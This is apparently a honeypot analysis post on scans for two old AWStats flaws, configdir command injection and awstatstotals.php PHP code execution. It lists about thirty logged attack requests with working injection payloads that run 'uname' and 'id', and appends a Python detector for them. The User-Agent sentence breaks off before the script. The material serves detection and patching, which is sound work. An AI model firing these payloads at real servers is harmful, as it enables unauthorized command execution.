Our daily web honeypot analysis has detected an increase in scanning looking for command injection flaws in the Awstats package.

Here are example attacks from the logs:

GET /awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0
GET /awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1
GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1
GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1
GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1
GET /cgi-bin/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0
GET /cgi-bin/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1
GET /cgi-bin/awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0
GET /cgi-bin/awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1
GET /cgi-bin/stats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0
GET /cgi-bin/stats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1
GET /cgi/awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0
GET /cgi/awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1
GET /scgi-bin/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0
GET /scgi-bin/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1
GET /scgi-bin/awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0
GET /scgi-bin/awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1
GET /scgi-bin/stats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0
GET /scgi-bin/stats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1
GET /scgi/awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0
GET /scgi/awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1
GET /scripts/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0
GET /scripts/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1
GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1
GET /stats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.0
GET /stats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1

According to OSVDB, there are two different vulnerabilities that they are probing for:

13002 : AWStats configdir Parameter Arbitrary Command Execution
47807 : AWStats Totals awstatstotals.php multisort() Function sort Parameter Arbitrary PHP Code Execution

Both of these vulnerability disclosures are old (20) so we are unsure why there is a sudden uptick in scanning. If you are running Awstats software, you should make sure you are updated.

While there were a number of different source IP addresses used, all of the requests had the exact same User-Agent string:
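To check your own access logs for the same two probes, the sketch below classifies request lines like the ones logged above. It is an added example, not code from the original post; the function names and the matching rules (shell metacharacters in `configdir`, `${` in the `sort` value of `awstatstotals.php`) are heuristics assumed from the logged requests, not an official signature.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The logged targets contain raw spaces, so the line cannot be split on
# whitespace: the first token is the method, the last is the protocol.
REQUEST_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>.+) (?P<proto>HTTP/\d\.\d)$")
SHELL_META = re.compile(r"[|;&`]|\$\(")  # assumed heuristic, not exhaustive

# First two lines are copied from the honeypot log above; the last two are
# constructed benign requests for contrast.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/awstats/?configdir=|echo echo%20YYYAAZ uname id echo%20YYY echo| HTTP/1.1",
    "GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29"
    "%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0",
    "GET /awstats/awstats.pl?config=example.org HTTP/1.1",
    "GET /awstatstotals.php?sort=1 HTTP/1.1",
]

def classify(request_line):
    """Return the OSVDB id a request line appears to probe for, or None."""
    m = REQUEST_RE.match(request_line.strip())
    if not m:
        return None
    url = urlsplit(m.group("target"))
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    # configdir should be a directory path; a pipe or other shell
    # metacharacter matches the command injection probe.
    if any(SHELL_META.search(v) for v in params.get("configdir", [])):
        return "OSVDB-13002"
    # PHP complex-variable syntax "${...}" in sort matches the code execution probe.
    if url.path.lower().endswith("awstatstotals.php"):
        if any("${" in v for v in params.get("sort", [])):
            return "OSVDB-47807"
    return None

def summarize(lines):
    """Count probe hits per OSVDB id across an iterable of request lines."""
    counts = {}
    for line in lines:
        hit = classify(line)
        if hit:
            counts[hit] = counts.get(hit, 0) + 1
    return counts

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(classify(line), "<-", line)
```

Matching on the decoded parameter value rather than the raw line means the rule also fires when the probe is sent to a path that is not in the list above.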